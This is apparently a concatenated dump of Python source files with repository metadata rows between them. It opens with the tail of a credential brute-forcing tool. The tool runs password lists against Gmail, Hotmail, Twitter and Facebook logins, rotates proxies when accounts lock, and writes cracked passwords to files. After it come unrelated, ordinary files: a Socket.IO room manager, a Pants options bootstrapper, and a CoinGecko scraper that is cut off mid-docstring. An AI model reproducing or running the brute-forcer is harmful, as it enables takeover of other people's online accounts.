Save = io.open("Facebook.txt","a").write("Account Facebook:"+facebook+"\t\tPassword:"+password+"\n")
break
else :
print("False Login Password%s\n")
except:
print('[!] <<<There are speeches in Communication>>> \n')
proxy()
def twitter():
password_list = io.open(list_password,"r").readlines()
try_login = 0
print("\rTwitter Account: {}".format(twitter))
print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s"%(R,W))
for password in password_list:
password = password.rstrip('\n')
try_login += 1
if try_login == 10:
try_login = 0
proxy()
print('\rPassword [==] {} '.format(password).rstrip("\n"))
sys.stdout.flush
url = "https://mobile.twitter.com/login"
try:
brows.open(url, timeout=5)
brows.select_form(nr=0)
brows.form['session[username_or_email]'] = options.twitter.strip()
brows.form['session[password]'] = password
brows.method = "POST"
submit = brows.submit()
if submit.geturl() == "https://mobile.twitter.com/":
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Twitter.txt","a").write("Account Twitter:"+options.twitter+"\t\tPassword:"+password+"\n")
break
elif submit.geturl() == "https://mobile.twitter.com/home":
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Twitter.txt","a").write("Account Twitter:"+options.twitter+"\t\tPassword:"+password+"\n")
break
elif 'https://mobile.twitter.com/account/login_challenge' in submit.geturl():
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Twitter.txt","a").write("Account Twitter:"+options.twitter+"\t\tPassword:"+password+"\n")
break
elif 'https://mobile.twitter.com/account/locked' in submit.geturl():
proxy()
else:
print("%s[!] False Login Password%s\n"%(R,W))
except:
print('[!] <<<There are speeches in Communication>>> \n')
proxy()
def bruteforce(self):
progress = Progressbar(self, orient=HORIZONTAL, length=200, mode='determinate')
progress.place(x=600, y=200)
use = OptionParser()
use.add_option("-g", "--gmail", dest="gmail", help="Write Your Account gmail")
use.add_option("-t", "--hotmail", dest="hotmail", help="Write Your Account hotmail")
use.add_option("-T", "--twitter", dest="twitter", help="Write Your Account twitter")
use.add_option("-f", "--facebook", dest="facebook", help="Write Your Account facebook")
use.add_option("-n", "--netflix", dest="netflix", help="Write Your Account Netflix")
use.add_option("-l", "--list", dest="list_password", help="Write Your list passowrd")
use.add_option("-p", "--password", dest="password", help="Write Your passowrd ")
use.add_option("-X", "--proxy", dest="proxy", help="Proxy list ")
(options, args) = use.parse_args()
brows = Browser()
brows.set_handle_robots(False)
brows._factory.is_html = True
brows.set_cookiejar(cookielib.LWPCookieJar())
useragents = [
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081202 Firefox (Debian-2.0.0.19-0etch1)',
'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6']
brows.addheaders = [('User-agent', random.choice(useragents))]
brows.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
proxyList = options.proxy
if options.gmail == None:
if options.hotmail == None:
if options.twitter == None:
if facebook == None:
if options.netflix == None:
print(use.usage)
exit()
elif options.hotmail != None or options.gmail == None:
smtp_srverH = smtplib.SMTP('smtp.live.com', 587)
smtp_srverH.ehlo()
smtp_srverH.starttls()
if options.password != None or options.list_password == None:
print("<<<<<<+++++Start Attacking Email+++++>>>>>")
try:
smtp_srverH.login(options.hotmail, options.password)
print("Found Password :{} \t Found Hotmail:{}".format(options.password, options.hotmail))
Save = io.open("Hotmail.txt", "a").write(
"Account Hotmail:" + options.hotmail + "\t\tPassword:" + options.password + "\n")
except:
print("Not Found Password : {} \t Email Hotmail:{}".format(options.password, options.hotmail))
elif options.list_password != None or options.password == None:
password_list = io.open(options.list_password, "r").readlines()
for password in password_list:
try:
print("<<<<<<+++++Start Attacking Email+++++>>>>>")
smtp_srverH.login(options.hotmail, password)
print("FOUND Password :{} \n Found Hotmail:{}".format(password, options.hotmail))
Save = io.open("Hotmail.txt", "a").write(
"Account Hotmail:" + options.hotmail + "\t\tPassword:" + password + "\n")
except smtplib.SMTPAuthenticationError:
print("Not Found Password : {} \t Email Hotmail:{}".format(password, options.hotmail))
if options.twitter != None:
hejab = threading.Thread(target=twitter, name="hejab")
hejab.start()
if options.facebook != None:
facebook(brows)
if options.netflix != None:
netflix = threading.Thread(target=Netflix, name="Netflix")
netflix.start()
elif options.gmail != None or options.hotmail == None or options.twitter == None:
smtp_srverG = smtplib.SMTP('smtp.gmail.com', 587)
smtp_srverG.ehlo()
smtp_srverG.starttls()
if options.password != None or options.list_password == None:
print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s" % (R, W))
try:
smtp_srverG.login(options.gmail, options.password)
print("Found Password :{} \t Found Gmail:{}".format(options.password, options.gmail))
Save = io.open("Gmail.txt", "a").write(
"Account Gmail:" + options.gmail + "\t\tPassword:" + options.password + "\n")
except:
print("Not Found Password : {} \t Email Gmail:{}".format(options.password, options.gmail))
elif options.list_password != None:
password_list = io.open(options.list_password, "r").readlines()
for password in password_list:
password = password.rstrip("\n")
print("<<<<<<+++++Start Attacking Email+++++>>>>>")
try:
smtp_srverG.login(options.gmail, password)
print("{}<<<+++Found Password :{} \t Found Gmail:{}+++>>>".format(G, password, options.gmail))
Save = io.open("Gmail.txt", "a").write(
"Account Gmail:" + options.gmail + "\t\tPassword:" + password + "\n")
break
except smtplib.SMTPAuthenticationError:
print("{}<<<---Not Found Password : {} \t Email Gmail:{}--->>>".format(R, password, options.gmail))
else:
print(use.usage)
exit()
############################################################THE END####################################################################
root = Tk()
bruteforce(root)
root.mainloop()
| 44.11583 | 143 | 0.553037 |
795bb93a9c95e13049eb5474019eb1afa55a06c9 | 6,905 | py | Python | env/Lib/site-packages/socketio/base_manager.py | NXPY123/gsoc-tagger | c85602ae9f5dbb9bec45cc5e9e50ec62177d46a5 | [
"MIT"
] | 9 | 2021-02-15T05:53:17.000Z | 2022-02-25T01:47:09.000Z | env/Lib/site-packages/socketio/base_manager.py | NXPY123/gsoc-tagger | c85602ae9f5dbb9bec45cc5e9e50ec62177d46a5 | [
"MIT"
] | 5 | 2022-02-04T13:00:12.000Z | 2022-02-24T18:13:24.000Z | env/Lib/site-packages/socketio/base_manager.py | NXPY123/gsoc-tagger | c85602ae9f5dbb9bec45cc5e9e50ec62177d46a5 | [
"MIT"
] | 7 | 2022-02-05T20:29:14.000Z | 2022-03-26T13:16:44.000Z | import itertools
import logging
from bidict import bidict
default_logger = logging.getLogger('socketio')
class BaseManager(object):
    """Manage client connections.

    This class keeps track of all the clients and the rooms they are in, to
    support the broadcasting of messages. The data used by this class is
    stored in a memory structure, making it appropriate only for single process
    services. More sophisticated storage backends can be implemented by
    subclasses.
    """
    def __init__(self):
        self.logger = None
        self.server = None
        # Nested mapping of room membership; each room is a bidict so the
        # Socket.IO sid <-> Engine.IO sid association can be looked up in
        # either direction.
        self.rooms = {}  # self.rooms[namespace][room][sio_sid] = eio_sid
        # NOTE(review): not referenced within this class — presumably kept for
        # subclasses; confirm before removing.
        self.eio_to_sid = {}
        # self.callbacks[sid][id] = callback; slot 0 holds the id counter.
        self.callbacks = {}
        # namespace -> list of sids currently going through disconnect.
        self.pending_disconnect = {}

    def set_server(self, server):
        # Attach the Socket.IO server instance this manager belongs to.
        self.server = server

    def initialize(self):
        """Invoked before the first request is received. Subclasses can add
        their initialization code here.
        """
        pass

    def get_namespaces(self):
        """Return an iterable with the active namespace names."""
        return self.rooms.keys()

    def get_participants(self, namespace, room):
        """Return an iterable with the active participants in a room."""
        # Iterate over a copy of the forward mapping so membership changes
        # during iteration do not raise.
        for sid, eio_sid in self.rooms[namespace][room]._fwdm.copy().items():
            yield sid, eio_sid

    def connect(self, eio_sid, namespace):
        """Register a client connection to a namespace."""
        sid = self.server.eio.generate_id()
        # Every client joins the namespace-wide room (None) and a private
        # room named after its own sid.
        self.enter_room(sid, namespace, None, eio_sid=eio_sid)
        self.enter_room(sid, namespace, sid, eio_sid=eio_sid)
        return sid

    def is_connected(self, sid, namespace):
        # Returns True when connected, False while a disconnect is pending,
        # and None (falsy) when the sid is unknown.
        if namespace in self.pending_disconnect and \
                sid in self.pending_disconnect[namespace]:
            # the client is in the process of being disconnected
            return False
        try:
            return self.rooms[namespace][None][sid] is not None
        except KeyError:
            pass

    def sid_from_eio_sid(self, eio_sid, namespace):
        # Reverse lookup through the bidict's inverse mapping; None if absent.
        try:
            return self.rooms[namespace][None]._invm[eio_sid]
        except KeyError:
            pass

    def eio_sid_from_sid(self, sid, namespace):
        # Forward lookup; returns None for unknown namespace or sid.
        if namespace in self.rooms:
            return self.rooms[namespace][None].get(sid)

    def can_disconnect(self, sid, namespace):
        # A client can only be disconnected while it is still connected.
        return self.is_connected(sid, namespace)

    def pre_disconnect(self, sid, namespace):
        """Put the client in the to-be-disconnected list.

        This allows the client data structures to be present while the
        disconnect handler is invoked, but still recognize the fact that the
        client is soon going away.
        """
        if namespace not in self.pending_disconnect:
            self.pending_disconnect[namespace] = []
        self.pending_disconnect[namespace].append(sid)
        return self.rooms[namespace][None].get(sid)

    def disconnect(self, sid, namespace):
        """Register a client disconnect from a namespace."""
        if namespace not in self.rooms:
            return
        rooms = []
        # Collect first, then leave: leave_room mutates self.rooms.
        for room_name, room in self.rooms[namespace].copy().items():
            if sid in room:
                rooms.append(room_name)
        for room in rooms:
            self.leave_room(sid, namespace, room)
        if sid in self.callbacks:
            del self.callbacks[sid]
        if namespace in self.pending_disconnect and \
                sid in self.pending_disconnect[namespace]:
            self.pending_disconnect[namespace].remove(sid)
            if len(self.pending_disconnect[namespace]) == 0:
                del self.pending_disconnect[namespace]

    def enter_room(self, sid, namespace, room, eio_sid=None):
        """Add a client to a room."""
        if namespace not in self.rooms:
            self.rooms[namespace] = {}
        if room not in self.rooms[namespace]:
            self.rooms[namespace][room] = bidict()
        if eio_sid is None:
            # Resolve the Engine.IO sid from the namespace-wide room.
            eio_sid = self.rooms[namespace][None][sid]
        self.rooms[namespace][room][sid] = eio_sid

    def leave_room(self, sid, namespace, room):
        """Remove a client from a room."""
        # Prune empty rooms and namespaces as a side effect.
        try:
            del self.rooms[namespace][room][sid]
            if len(self.rooms[namespace][room]) == 0:
                del self.rooms[namespace][room]
                if len(self.rooms[namespace]) == 0:
                    del self.rooms[namespace]
        except KeyError:
            pass

    def close_room(self, room, namespace):
        """Remove all participants from a room."""
        try:
            for sid, _ in self.get_participants(namespace, room):
                self.leave_room(sid, namespace, room)
        except KeyError:
            pass

    def get_rooms(self, sid, namespace):
        """Return the rooms a client is in."""
        r = []
        try:
            for room_name, room in self.rooms[namespace].items():
                # Skip the namespace-wide pseudo-room (None).
                if room_name is not None and sid in room:
                    r.append(room_name)
        except KeyError:
            pass
        return r

    def emit(self, event, data, namespace, room=None, skip_sid=None,
             callback=None, **kwargs):
        """Emit a message to a single client, a room, or all the clients
        connected to the namespace."""
        if namespace not in self.rooms or room not in self.rooms[namespace]:
            return
        # Normalize skip_sid so a single sid and a list are handled alike.
        if not isinstance(skip_sid, list):
            skip_sid = [skip_sid]
        for sid, eio_sid in self.get_participants(namespace, room):
            if sid not in skip_sid:
                if callback is not None:
                    id = self._generate_ack_id(sid, callback)
                else:
                    id = None
                self.server._emit_internal(eio_sid, event, data, namespace, id)

    def trigger_callback(self, sid, id, data):
        """Invoke an application callback."""
        callback = None
        try:
            callback = self.callbacks[sid][id]
        except KeyError:
            # if we get an unknown callback we just ignore it
            self._get_logger().warning('Unknown callback received, ignoring.')
        else:
            # Callbacks are one-shot: remove before invoking.
            del self.callbacks[sid][id]
        if callback is not None:
            callback(*data)

    def _generate_ack_id(self, sid, callback):
        """Generate a unique identifier for an ACK packet."""
        if sid not in self.callbacks:
            # Slot 0 stores the monotonically increasing id counter.
            self.callbacks[sid] = {0: itertools.count(1)}
        id = next(self.callbacks[sid][0])
        self.callbacks[sid][id] = callback
        return id

    def _get_logger(self):
        """Get the appropriate logger

        Prevents uninitialized servers in write-only mode from failing.
        """
        if self.logger:
            return self.logger
        elif self.server:
            return self.server.logger
        else:
            return default_logger
| 35.777202 | 79 | 0.602317 |
795bb989eb24a6e6fa7d2592744c9fc6c0b58884 | 9,901 | py | Python | src/python/pants/option/options_bootstrapper.py | AHassanSOS/pants | fe3d9834c0e2d78bb252604d6572ffd3b7ac5226 | [
"Apache-2.0"
] | 1 | 2020-08-26T03:30:31.000Z | 2020-08-26T03:30:31.000Z | src/python/pants/option/options_bootstrapper.py | AHassanSOS/pants | fe3d9834c0e2d78bb252604d6572ffd3b7ac5226 | [
"Apache-2.0"
] | 1 | 2021-09-02T14:16:37.000Z | 2021-09-02T14:16:37.000Z | src/python/pants/option/options_bootstrapper.py | AHassanSOS/pants | fe3d9834c0e2d78bb252604d6572ffd3b7ac5226 | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import itertools
import logging
import os
import stat
import sys
from pants.base.build_environment import get_default_pants_config_file
from pants.engine.fs import FileContent
from pants.option.arg_splitter import GLOBAL_SCOPE, GLOBAL_SCOPE_CONFIG_SECTION
from pants.option.config import Config
from pants.option.custom_types import ListValueComponent
from pants.option.global_options import GlobalOptionsRegistrar
from pants.option.options import Options
from pants.util.dirutil import read_file
from pants.util.memo import memoized_method, memoized_property
from pants.util.objects import SubclassesOf, datatype
from pants.util.strutil import ensure_text
logger = logging.getLogger(__name__)
class OptionsBootstrapper(datatype([
    ('env_tuples', tuple),
    ('bootstrap_args', tuple),
    ('args', tuple),
    ('config', SubclassesOf(Config)),
])):
    """Holds the result of the first stage of options parsing, and assists with parsing full options."""

    @staticmethod
    def get_config_file_paths(env, args):
        """Get the location of the config files.

        The locations are specified by the --pants-config-files option. However we need to load the
        config in order to process the options. This method special-cases --pants-config-files
        in order to solve this chicken-and-egg problem.

        Note that, obviously, it's not possible to set the location of config files in a config file.
        Doing so will have no effect.
        """
        # This exactly mirrors the logic applied in Option to all regular options. Note that we'll
        # also parse --pants-config as a regular option later, but there's no harm in that. In fact,
        # it's preferable, so that any code that happens to want to know where we read config from
        # can inspect the option.
        flag = '--pants-config-files='
        evars = ['PANTS_GLOBAL_PANTS_CONFIG_FILES', 'PANTS_PANTS_CONFIG_FILES', 'PANTS_CONFIG_FILES']

        path_list_values = []
        if os.path.isfile(get_default_pants_config_file()):
            path_list_values.append(ListValueComponent.create(get_default_pants_config_file()))
        # Only the first matching env var wins (most specific first).
        for var in evars:
            if var in env:
                path_list_values.append(ListValueComponent.create(env[var]))
                break

        for arg in args:
            # Technically this is very slightly incorrect, as we don't check scope.  But it's
            # very unlikely that any task or subsystem will have an option named --pants-config-files.
            # TODO: Enforce a ban on options with a --pants- prefix outside our global options?
            if arg.startswith(flag):
                path_list_values.append(ListValueComponent.create(arg[len(flag):]))

        return ListValueComponent.merge(path_list_values).val

    @staticmethod
    def parse_bootstrap_options(env, args, config):
        # Parse only the bootstrap (global-scope) options from the given inputs.
        bootstrap_options = Options.create(
            env=env,
            config=config,
            known_scope_infos=[GlobalOptionsRegistrar.get_scope_info()],
            args=args,
        )

        def register_global(*args, **kwargs):
            ## Only use of Options.register?
            bootstrap_options.register(GLOBAL_SCOPE, *args, **kwargs)

        GlobalOptionsRegistrar.register_bootstrap_options(register_global)
        return bootstrap_options

    @classmethod
    def from_options_parse_request(cls, parse_request):
        # Convenience constructor from an OptionsParseRequest-like object.
        return cls.create(env=dict(parse_request.env), args=parse_request.args)

    @classmethod
    def create(cls, env=None, args=None):
        """Parses the minimum amount of configuration necessary to create an OptionsBootstrapper.

        :param env: An environment dictionary, or None to use `os.environ`.
        :param args: An args array, or None to use `sys.argv`.
        """
        # Only PANTS_* env vars can influence option values.
        env = {k: v for k, v in (os.environ if env is None else env).items()
               if k.startswith('PANTS_')}
        args = tuple(sys.argv if args is None else args)

        flags = set()
        short_flags = set()

        # TODO: This codepath probably shouldn't be using FileContent, which is a very v2 engine thing.
        def filecontent_for(path):
            # Capture the executable bit along with the file bytes.
            is_executable = os.stat(path).st_mode & stat.S_IXUSR == stat.S_IXUSR
            return FileContent(
                ensure_text(path),
                read_file(path, binary_mode=True),
                is_executable=is_executable,
            )

        def capture_the_flags(*args, **kwargs):
            # Record every registered bootstrap flag (and its --no- negation
            # for booleans) so we can recognize them on the command line.
            for arg in args:
                flags.add(arg)
                if len(arg) == 2:
                    short_flags.add(arg)
                elif kwargs.get('type') == bool:
                    flags.add('--no-{}'.format(arg[2:]))

        GlobalOptionsRegistrar.register_bootstrap_options(capture_the_flags)

        def is_bootstrap_option(arg):
            components = arg.split('=', 1)
            if components[0] in flags:
                return True
            for flag in short_flags:
                if arg.startswith(flag):
                    return True
            return False

        # Take just the bootstrap args, so we don't choke on other global-scope args on the cmd line.
        # Stop before '--' since args after that are pass-through and may have duplicate names to our
        # bootstrap options.
        bargs = tuple(filter(is_bootstrap_option, itertools.takewhile(lambda arg: arg != '--', args)))

        config_file_paths = cls.get_config_file_paths(env=env, args=args)
        config_files_products = [filecontent_for(p) for p in config_file_paths]
        pre_bootstrap_config = Config.load_file_contents(config_files_products)

        initial_bootstrap_options = cls.parse_bootstrap_options(env, bargs, pre_bootstrap_config)
        bootstrap_option_values = initial_bootstrap_options.for_global_scope()

        # Now re-read the config, post-bootstrapping. Note the order: First whatever we bootstrapped
        # from (typically pants.ini), then config override, then rcfiles.
        full_configpaths = pre_bootstrap_config.sources()
        if bootstrap_option_values.pantsrc:
            rcfiles = [os.path.expanduser(str(rcfile)) for rcfile in bootstrap_option_values.pantsrc_files]
            existing_rcfiles = list(filter(os.path.exists, rcfiles))
            full_configpaths.extend(existing_rcfiles)

        full_config_files_products = [filecontent_for(p) for p in full_configpaths]
        post_bootstrap_config = Config.load_file_contents(
            full_config_files_products,
            seed_values=bootstrap_option_values
        )

        # Sort for a deterministic, hashable representation of the env.
        env_tuples = tuple(sorted(env.items(), key=lambda x: x[0]))
        return cls(env_tuples=env_tuples, bootstrap_args=bargs, args=args, config=post_bootstrap_config)

    @memoized_property
    def env(self):
        # Rehydrate the env dict from its hashable tuple form.
        return dict(self.env_tuples)

    @memoized_property
    def bootstrap_options(self):
        """The post-bootstrap options, computed from the env, args, and fully discovered Config.

        Re-computing options after Config has been fully expanded allows us to pick up bootstrap values
        (such as backends) from a config override file, for example.

        Because this can be computed from the in-memory representation of these values, it is not part
        of the object's identity.
        """
        return self.parse_bootstrap_options(self.env, self.bootstrap_args, self.config)

    def get_bootstrap_options(self):
        """:returns: an Options instance that only knows about the bootstrap options.
        :rtype: :class:`Options`
        """
        return self.bootstrap_options

    @memoized_method
    def _full_options(self, known_scope_infos):
        bootstrap_option_values = self.get_bootstrap_options().for_global_scope()
        options = Options.create(self.env,
                                 self.config,
                                 known_scope_infos,
                                 args=self.args,
                                 bootstrap_option_values=bootstrap_option_values)

        # Register each optionable class at most once, in deterministic
        # (scope-sorted) order.
        distinct_optionable_classes = set()
        for ksi in sorted(known_scope_infos, key=lambda si: si.scope):
            if not ksi.optionable_cls or ksi.optionable_cls in distinct_optionable_classes:
                continue
            distinct_optionable_classes.add(ksi.optionable_cls)
            ksi.optionable_cls.register_options_on_scope(options)

        return options

    def get_full_options(self, known_scope_infos):
        """Get the full Options instance bootstrapped by this object for the given known scopes.

        :param known_scope_infos: ScopeInfos for all scopes that may be encountered.
        :returns: A bootrapped Options instance that also carries options for all the supplied known
                  scopes.
        :rtype: :class:`Options`
        """
        # Dedupe and sort so the memoized cache key is canonical.
        return self._full_options(tuple(sorted(set(known_scope_infos))))

    def verify_configs_against_options(self, options):
        """Verify all loaded configs have correct scopes and options.

        :param options: Fully bootstrapped valid options.
        :return: None.
        """
        error_log = []
        for config in self.config.configs():
            for section in config.sections():
                if section == GLOBAL_SCOPE_CONFIG_SECTION:
                    scope = GLOBAL_SCOPE
                else:
                    scope = section
                try:
                    valid_options_under_scope = set(options.for_scope(scope))
                # Only catch ConfigValidationError. Other exceptions will be raised directly.
                except Config.ConfigValidationError:
                    error_log.append("Invalid scope [{}] in {}".format(section, config.configpath))
                else:
                    # All the options specified under [`section`] in `config` excluding bootstrap defaults.
                    all_options_under_scope = (set(config.configparser.options(section)) -
                                               set(config.configparser.defaults()))
                    for option in all_options_under_scope:
                        if option not in valid_options_under_scope:
                            error_log.append("Invalid option '{}' under [{}] in {}".format(option, section, config.configpath))

        if error_log:
            for error in error_log:
                logger.error(error)
            raise Config.ConfigValidationError("Invalid config entries detected. "
                                               "See log for details on which entries to update or remove.\n"
                                               "(Specify --no-verify-config to disable this check.)")
| 40.913223 | 113 | 0.710231 |
795bba0563a95eb5c132aab78156353860ff8405 | 14,172 | py | Python | gamestonk_terminal/cryptocurrency/discovery/pycoingecko_model.py | Aerex/GamestonkTerminal | 680e0cd278f0d8e45031cdc9d51f247e9aa90ce1 | [
"MIT"
] | 3 | 2021-02-28T09:54:47.000Z | 2021-03-11T17:42:35.000Z | gamestonk_terminal/cryptocurrency/discovery/pycoingecko_model.py | Aerex/GamestonkTerminal | 680e0cd278f0d8e45031cdc9d51f247e9aa90ce1 | [
"MIT"
] | 3 | 2022-02-28T03:37:52.000Z | 2022-02-28T03:37:53.000Z | gamestonk_terminal/cryptocurrency/discovery/pycoingecko_model.py | Aerex/GamestonkTerminal | 680e0cd278f0d8e45031cdc9d51f247e9aa90ce1 | [
"MIT"
] | 1 | 2021-11-20T16:09:48.000Z | 2021-11-20T16:09:48.000Z | """CoinGecko model"""
__docformat__ = "numpy"
import pandas as pd
from pycoingecko import CoinGeckoAPI
from gamestonk_terminal.cryptocurrency.dataframe_helpers import (
percent_to_float,
create_df_index,
wrap_text_in_df,
)
from gamestonk_terminal.cryptocurrency.pycoingecko_helpers import (
changes_parser,
replace_qm,
clean_row,
collateral_auditors_parse,
swap_columns,
scrape_gecko_data,
get_btc_price,
GECKO_BASE_URL,
)
# Mapping of user-facing period names to the CoinGecko URL query suffix.
PERIODS = {
    "1h": "?time=h1",
    "24h": "?time=h24",
    "7d": "?time=d7",
    "14d": "?time=d14",
    "30d": "?time=d30",
    "60d": "?time=d60",
    "1y": "?time=y1",
}

# Mapping of discovery category name to its positional index on the
# CoinGecko "discover" page.
CATEGORIES = {
    "trending": 0,
    "most_voted": 1,
    "positive_sentiment": 2,
    "recently_added": 3,
    "most_visited": 4,
}
def get_gainers_or_losers(period: str = "1h", typ: str = "gainers") -> pd.DataFrame:
    """Scrape data about top gainers - coins which gain the most in given period and
    top losers - coins that lost the most in given period of time. [Source: CoinGecko]

    Parameters
    ----------
    period: str
        One from [1h, 24h, 7d, 14d, 30d, 60d, 1y]
    typ: str
        Either "gainers" or "losers"

    Returns
    -------
    pandas.DataFrame
        Top Gainers / Top Losers - coins which gain/lost most in price in given period of time.
        Columns: Symbol, Name, Volume, Price, %Change_{period}, Url

    Raises
    ------
    ValueError
        If ``period`` or ``typ`` is not one of the supported values.
    """
    # Position of the gainers/losers table on the scraped page.
    category = {
        "gainers": 0,
        "losers": 1,
    }
    if period not in PERIODS:
        raise ValueError(
            f"Wrong time period\nPlease chose one from list: {PERIODS.keys()}"
        )
    # Fix: validate typ as well; previously an unknown typ made category.get(typ)
    # return None, which crashed below with an opaque TypeError on list indexing.
    if typ not in category:
        raise ValueError(
            f"Wrong type\nPlease chose one from list: {list(category.keys())}"
        )
    url = f"https://www.coingecko.com/en/coins/trending{PERIODS.get(period)}"
    rows = scrape_gecko_data(url).find_all("tbody")[category.get(typ)].find_all("tr")
    results = []
    for row in rows:
        url = GECKO_BASE_URL + row.find("a")["href"]
        symbol, name, *_, volume, price, change = clean_row(row)
        try:
            change = percent_to_float(change)
        except (ValueError, TypeError) as e:
            # Best effort: keep the raw string if it cannot be parsed.
            print(e)
        results.append([symbol, name, volume, price, change, url])
    df = pd.DataFrame(
        results,
        columns=[
            "Symbol",
            "Name",
            "Volume",
            "Price",
            f"%Change_{period}",
            "Url",
        ],
    )
    # 1-based rank column derived from the scrape order.
    df.index = df.index + 1
    df.reset_index(inplace=True)
    df = df.rename(columns={"index": "Rank"})
    df["Price"] = df["Price"].apply(lambda x: float(x.strip("$").replace(",", "")))
    return df
def get_discovered_coins(category: str = "trending") -> pd.DataFrame:
    """Scrapes data from "https://www.coingecko.com/en/discover" [Source: CoinGecko]
        - Most voted coins
        - Most popular coins
        - Recently added coins
        - Most positive sentiment coins

    Parameters
    ----------
    category: str
        - one from list: [trending, most_voted, positive_sentiment,recently_added, most_visited]

    Returns
    -------
    pandas.DataFrame:
        Most voted, most trending, recently added, most positive sentiment coins.
        Columns: Name, Price_BTC, Price_USD, Url
    """
    if category not in CATEGORIES:
        raise ValueError(
            f"Wrong category name\nPlease chose one from list: {CATEGORIES.keys()}"
        )
    url = "https://www.coingecko.com/en/discover"
    # The discover page lays each category out as one column div; pick the
    # requested one by its index.
    popular = scrape_gecko_data(url).find_all(
        "div", class_="col-12 col-sm-6 col-md-6 col-lg-4"
    )[CATEGORIES[category]]
    rows = popular.find_all("a")
    results = []
    btc_price = get_btc_price()
    for row in rows:
        name, *_, price = clean_row(row)
        url = GECKO_BASE_URL + row["href"]
        if price.startswith("BTC"):
            # Normalize "BTC0,0001"-style values to a plain decimal string.
            price = price.replace("BTC", "").replace(",", ".")
        # USD price derived from the current BTC price; None if BTC price
        # could not be fetched.
        price_usd = (int(btc_price) * float(price)) if btc_price else None
        results.append([name, price, price_usd, url])
    return pd.DataFrame(
        results,
        columns=[
            "Name",
            "Price_BTC",
            "Price_USD",
            "Url",
        ],
    )
def get_recently_added_coins() -> pd.DataFrame:
    """Scrape recently added coins on CoinGecko from "https://www.coingecko.com/en/coins/recently_added"
    [Source: CoinGecko]

    Returns
    -------
    pandas.DataFrame
        Recently Added Coins on CoinGecko
        Columns: Name, Symbol, Price, Change_1h, Change_24h, Added
    """
    columns = [
        "Name",
        "Symbol",
        "Price",
        "Change_1h",
        "Change_24h",
        "Added",
        "Url",
    ]
    url = "https://www.coingecko.com/en/coins/recently_added"
    rows = scrape_gecko_data(url).find("tbody").find_all("tr")
    results = []
    for row in rows:
        url = GECKO_BASE_URL + row.find("a")["href"]
        row_cleaned = clean_row(row)
        # Positional unpack of the scraped table cells; *changes collects a
        # variable number of percentage-change columns.
        (
            name,
            symbol,
            _,
            price,
            *changes,
            _,
            _volume,
            last_added,
        ) = row_cleaned
        change_1h, change_24h, _ = changes_parser(changes)
        results.append([name, symbol, price, change_1h, change_24h, last_added, url])
    df = replace_qm(pd.DataFrame(results, columns=columns))
    # 1-based rank column derived from the scrape order.
    df.index = df.index + 1
    df.reset_index(inplace=True)
    df.rename(columns={"index": "Rank"}, inplace=True)
    df["Price"] = df["Price"].apply(lambda x: float(x.strip("$").replace(",", "")))
    return df
def get_yield_farms() -> pd.DataFrame:
    """Scrapes yield farms data from "https://www.coingecko.com/en/yield-farming" [Source: CoinGecko]

    Returns
    -------
    pandas.DataFrame
        Top Yield Farms
        Columns: Rank, Name, Pool, Audits, Collateral, Value Locked, Return Year, Return Hour
    """
    columns = [
        "Rank",
        "Name",
        "Pool",
        "Audits",
        "Collateral",
        "Value_Locked",
        "Return_Year",
    ]
    url = "https://www.coingecko.com/en/yield-farming"
    rows = scrape_gecko_data(url).find("tbody").find_all("tr")
    results = []
    for row in rows:
        # Drop the last two scraped cells; they are not used.
        row_cleaned = clean_row(row)[:-2]
        if " New" in row_cleaned:  # find better way to fix it in future
            row_cleaned.remove(" New")

        # Pad rows that are missing the pool column so the unpack aligns.
        if len(row_cleaned) == 7:
            row_cleaned.insert(2, None)
        (
            rank,
            name,
            pool,
            *others,
            _,
            value_locked,
            apy1,
            _,  # hourly removed for most cases it's 0.00 so it doesn't bring any value for user
        ) = row_cleaned
        auditors, collateral = collateral_auditors_parse(others)
        auditors = ", ".join(aud.strip() for aud in auditors)
        collateral = ", ".join(coll.strip() for coll in collateral)
        results.append(
            [
                rank,
                name,
                pool,
                auditors,
                collateral,
                value_locked,
                apy1,
            ]
        )
    df = pd.DataFrame(results, columns=columns).replace({"": None})
    for col in ["Return_Year"]:
        # Strip the " Yearly" suffix from textual APY values.
        df[col] = df[col].apply(
            lambda x: x.replace(" Yearly", "") if isinstance(x, str) else x
        )
    df["Rank"] = df["Rank"].astype(int)
    df = wrap_text_in_df(df, w=30)
    return df
def get_top_volume_coins() -> pd.DataFrame:
    """Scrapes top coins by trading volume "https://www.coingecko.com/en/coins/high_volume" [Source: CoinGecko]

    Returns
    -------
    pandas.DataFrame
        Top Coins by Trading Volume
        Columns: Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume_24h, Market_Cap
    """
    columns = [
        "Rank",
        "Name",
        "Symbol",
        "Price",
        "Change_1h",
        "Change_24h",
        "Change_7d",
        "Volume_24h",
        "Market_Cap",
    ]
    url = "https://www.coingecko.com/en/coins/high_volume"
    rows = scrape_gecko_data(url).find("tbody").find_all("tr")
    results = []
    for row in rows:
        row_cleaned = clean_row(row)
        # Pad rows that are missing the rank cell, then drop the unused
        # fourth cell so all rows have the same shape.
        if len(row_cleaned) == 9:
            row_cleaned.insert(0, "?")
        row_cleaned.pop(3)
        results.append(row_cleaned)
    df = replace_qm(pd.DataFrame(results, columns=columns))
    # Replace the scraped rank with a clean sequential index.
    df.drop("Rank", axis=1, inplace=True)
    create_df_index(df, "Rank")
    df["Price"] = df["Price"].apply(lambda x: float(x.strip("$").replace(",", "")))
    return df
def get_top_defi_coins() -> pd.DataFrame:
    """Scrapes top decentralized finance coins "https://www.coingecko.com/en/defi" [Source: CoinGecko]

    Returns
    -------
